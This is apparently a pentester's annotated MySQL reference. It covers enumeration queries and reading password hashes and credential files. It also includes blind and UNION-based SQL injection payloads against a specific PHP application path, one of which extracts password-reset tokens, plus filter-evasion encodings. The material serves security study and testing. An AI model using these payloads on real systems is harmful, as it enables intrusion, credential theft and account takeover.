MySQL – 3306 – TCP

Database Pentest

Common Commands

### connect as a named account; leave -p bare so the client prompts for the password ###
### (a password given inline as -pSECRET lands in shell history and in `ps` output) ###
### add -h HOST -P 3306 to reach a remote instance on the default port ###
mysql -u userName -p

### orient: list databases, pick one, list its tables ###
show databases;
use databaseName;
show tables;

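### who am I, as the server sees it ###
### user() is the identity the client claimed; current_user() is the account the server actually matched ###
### (they differ when the login was matched to a wildcard-host or anonymous account) ###
select user();
select current_user();

### NOTE: the next line is PostgreSQL, not MySQL. On MySQL look for Super_priv in mysql.user or ALL PRIVILEGES in SHOW GRANTS ###
SELECT current_setting('is_superuser');

### what the current account may do; the three forms are equivalent ###
SHOW GRANTS;
SHOW GRANTS FOR CURRENT_USER;
SHOW GRANTS FOR CURRENT_USER();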

### clear screen ###
### `system` (alias \!) hands the rest of the line to a shell on the CLIENT host, not on the database server ###
mysql > system clear;

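### privilege columns straight from the grant table (needs SELECT on mysql.*) ###
SELECT User, Update_priv FROM mysql.user;
### Super_priv and File_priv matter most: FILE is what INTO OUTFILE / LOAD_FILE() require ###
SELECT User, Host, Super_priv, File_priv FROM mysql.user;

### password hashes: the Password column exists on MariaDB and on MySQL before 5.7.6 ###
SELECT User, Host, Password FROM mysql.user;
### MySQL 5.7.6+ / 8.0 keep the hash in authentication_string instead ###
SELECT User, Host, authentication_string FROM mysql.user;

### same data via information_schema, plus IS_GRANTABLE (whether the privilege can be passed on to other accounts) ###
### the grantee value is literally 'root'@'localhost' including the single quotes; wrapping it in double quotes only works while ANSI_QUOTES is off ###
select privilege_type, is_grantable from information_schema.user_privileges where grantee = "'root'@'localhost'";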
The same table's IS_GRANTABLE column shows whether the account can pass each privilege on to other accounts (i.e. it was granted WITH GRANT OPTION).

### same query with /**/ in place of every space, for injection points that strip or reject whitespace ###
select/**/privilege_type/**/from/**/information_schema.user_privileges/**/where/**/grantee/**/=/**/"'root'@'localhost'"

GET /class/mods/_standard/social/index_public.php?q=test%27)/**/or/**/((char_length((select/**/version()))))=§15§%23

GET /class/mods/_standard/social/index_public.php?q=test%27)/**/or/**/(ascii(substring((select/**/user()),15,1)))=§53§%23 

GET /class/mods/_standard/social/index_public.php?q=test%27)/**/or/**/(ascii(substring((select/**/privilege_type/**/from/**/information_schema.user_privileges/**/where/**/grantee/**/=/**/"'root'@'localhost'"/**/order/**/by/**/privilege_type/**/limit/**/1),1,1)))=§53§%23 

Interesting Files

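### check for secrets/settings (needs root; also look in /etc/mysql/conf.d/ and any ~/.my.cnf for stored passwords) ###
sudo nano /etc/mysql/my.cnf

### set logging on for easier hacking in that my.cnf file ###
### both options belong under the [mysqld] section; the directory must be writable by the mysql OS user ###
### the general log records EVERY statement from every client, credentials included - it is sensitive and grows fast; disable and remove it when done ###
[mysqld]
general_log_file = /var/log/mysql/mysql.log ### or wherever
general_log      = 1

### restart mysql now (or, without a restart, from a SUPER account: SET GLOBAL general_log = 'ON';) ###
sudo systemctl restart mysql

### use the tail command to inspect the MySQL log file ###
### see all queries being executed as they happen ###
### see new lines as they come with the -f option ###
### (same path as general_log_file above - the original note had a typo in one of the two) ###
tail -f /var/log/mysql/mysql.log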

### environment key/value pairs
### Docker/compose-style MYSQL_* variables: both the root password and the application password sit here in plaintext ###
$ cat .env
MYSQL_DATABASE=databaseName
MYSQL_USER=dataUser
MYSQL_PASSWORD=userPassword
MYSQL_ROOT_PASSWORD=rootPassword
MYSQL_HOST=localhost
DOMAIN=test.tld
DEBUG=false

Encoding

### ASCII Encoding
### Blind Attack Example ###
### special characters in the extracted value can break the injection or the transport ###
### so compare one character at a time by its ASCII code instead ###
### substring() positions are 1-based; the comparison evaluates to 1 (true) or 0 (false) ###
select/**/ascii(substring((select/**/version()),1,1))=52;
### ascii 52 is equal to 5 ###
### Server version: 5.5.47-0+deb8u1-log (Debian) ###


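### Hex or base64 encodings
### NOTE: convert_from()/decode() are PostgreSQL, not MySQL; kept for reference ###
select convert_from(decode('aGF4b3I=', 'base64'), 'utf-8');
### MySQL / MariaDB equivalents - each gives 'haxor' ###
select from_base64('aGF4b3I=');
select unhex('6861786f72');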
	

### 0x... literals are binary strings in MySQL/MariaDB, so text can be supplied without any quote character ###
MariaDB [mysql]> select concat(0x31333337,0x206840783072)
    -> ;
+-----------------------------------+
| concat(0x31333337,0x206840783072) |
+-----------------------------------+
| 1337 h@x0r                        |
+-----------------------------------+
1 row in set (0.00 sec)


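### CHAR(n[, n...] USING charset) builds a string from code points - another way to avoid quote characters ###
SELECT CHAR(65 using ASCII);       ### returns "A"
SELECT CHAR(66,65,68 using ASCII); ### returns "BAD"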


### MariaDB
### CHR() is MariaDB-only (not present in MySQL); it accepts a number or a numeric string - use CHAR() where CHR() is unknown ###
SELECT CHR(67);
+---------+
| CHR(67) |
+---------+
| C       |
+---------+

SELECT CHR('67');
+-----------+
| CHR('67') |
+-----------+
| C         |
+-----------+



### Use comments for spaces /**/
### the parser treats an inline comment as whitespace, so this survives filters that strip or reject spaces ###
select/**/'w00t';

Create, Read, or Update Files

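### NOTE: the next five statements are PostgreSQL (TEMP table + COPY with $$ dollar-quoting), not MySQL; kept for reference ###
### create table
CREATE temp table awae (content text);
### copy data to table from another file
COPY awae from $$c:\awae.txt$$;
### read the file's contents
SELECT content from awae;
DROP table awae;

### write to a file on the server
COPY (SELECT $$offsec$$) to $$c:\\offsec.txt$$;

### MySQL / MariaDB equivalents. All need the FILE privilege, run as the mysqld OS user on the SERVER host, ###
### and are fenced by secure_file_priv (NULL = disabled, '' = anywhere, otherwise only that directory) ###
### read a file - returns NULL instead of an error when denied, unreadable, or larger than max_allowed_packet ###
SELECT LOAD_FILE('/etc/passwd');
### or load it into a table ###
CREATE TEMPORARY TABLE awae (content text);
LOAD DATA INFILE '/etc/passwd' INTO TABLE awae;
SELECT content FROM awae;
DROP TEMPORARY TABLE awae;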

### save query results to file
### needs the FILE privilege; the file is created by the mysqld OS user on the SERVER host (not the client), ###
### must not already exist, and the path must be allowed by secure_file_priv (SHOW VARIABLES LIKE 'secure_file_priv') ###
SELECT id_order,lastname,firstname,productName,productPrice
FROM _commandes
WHERE id_order=13
INTO OUTFILE 'C:/Documents and Settings/Stagiaire/Mes documents/Document/bonDeCommandes/No13.txt'
FIELDS TERMINATED BY ','
ENCLOSED BY '"'
LINES TERMINATED BY '\n'

SQL Injection Payloads

Basic

### the leading " closes the string the input lands in, # comments out the rest of the original query; 1..5 must match its column count ###
_scope" UNION ALL SELECT 1,2,3,4,5#

Version

### @@version pins the exact server build ###
_scope" UNION ALL SELECT 1,2,3,4,@@version#

Name from __Auth

### pull a column once the reflected position (here the 5th) is known ###
_scope" UNION ALL SELECT 1,2,3,4,name FROM __Auth#

Collation

### look up the collation of the column the injected value is UNIONed with ###
_scope" UNION ALL SELECT 1,2,3,4,COLLATION_NAME FROM information_schema.columns WHERE TABLE_NAME = "__global_search" AND COLUMN_NAME = "name"#

Name

### UNION fails with "Illegal mix of collations" when the two sides differ; COLLATE forces the match found above ###
_scope" UNION ALL SELECT 1,2,3,4,name COLLATE utf8mb4_general_ci FROM __Auth#

Column Names

### enumerate the columns of a known table through information_schema ###
_scope" UNION ALL SELECT 1,2,3,4,COLUMN_NAME FROM information_schema.columns WHERE TABLE_NAME = "tabUser"#

Name and Reset Token

### reset tokens are presumably credential-equivalent (a valid one lets you set that user's password) - handle and report them like passwords ###
_scope" UNION ALL SELECT name COLLATE utf8mb4_general_ci,2,3,4,reset_password_key COLLATE utf8mb4_general_ci FROM tabUser#

Code Review

Searching is weak in JD-GUI, so save the decompiled code and use Notepad++ instead. In JD-GUI, use the File > Save All Sources menu. Then open Notepad++ and use ‘Find in Files’ (Ctrl+Shift+F). Search for good ol’ SELECT. We can improve the search using a regular expression; make sure the ‘Regular Expression’ radio button is selected.

^.*query.*select.*

This matches any line that has ‘query’ in it followed later by ‘select’ (`.*` is “any run of characters”; the original `.?` allowed at most one character, so it only matched when ‘query’ was the first or second character on the line). A tighter pattern, for statements that concatenate a value straight into a WHERE clause:

^.*query.*select.*where.*=.*".*\+.*

The plus is a special character so it needs an escape in front of it.

**always** need escaping (outside a character class)
\.\[\]\\ — `-` only matters inside a character class, and `/` only when the pattern is delimited by slashes (e.g. a JavaScript literal); neither needs escaping in Notepad++

need escaping when **not** in a character class- [a-z*+{}()?]
\*\+\?\)\{\}\| 
